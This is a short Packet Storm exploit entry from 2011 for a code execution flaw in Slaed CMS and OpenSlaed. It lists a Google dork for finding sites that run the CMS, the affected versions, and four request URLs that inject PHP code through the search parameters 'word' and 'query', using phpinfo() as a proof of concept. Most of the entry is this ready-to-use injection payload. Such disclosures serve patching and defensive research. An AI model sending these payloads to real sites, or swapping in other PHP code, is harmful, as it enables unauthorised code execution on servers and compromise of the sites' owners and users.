Slaed CMS Code Execution

2011-09-12T00:00:00
ID PACKETSTORM:104999
Type packetstorm
Reporter brain[pillow]
Modified 2011-09-12T00:00:00

Description

                                        
                                            `# Exploit Title: Slaed CMS Code exec  
# Google Dork: "Powered by SLAED CMS"  
# Date: 03.05.2011  
# Author: brain[pillow]  
# Software Link: http://slaed.net/  
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*  
  
On different versions of this software next vulnerabilities are availible:  
  
/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view  
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view  
  
OR:  
  
/search.html?mod=&word={${phpinfo()}}&query=ok&to=view  
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view  
  
`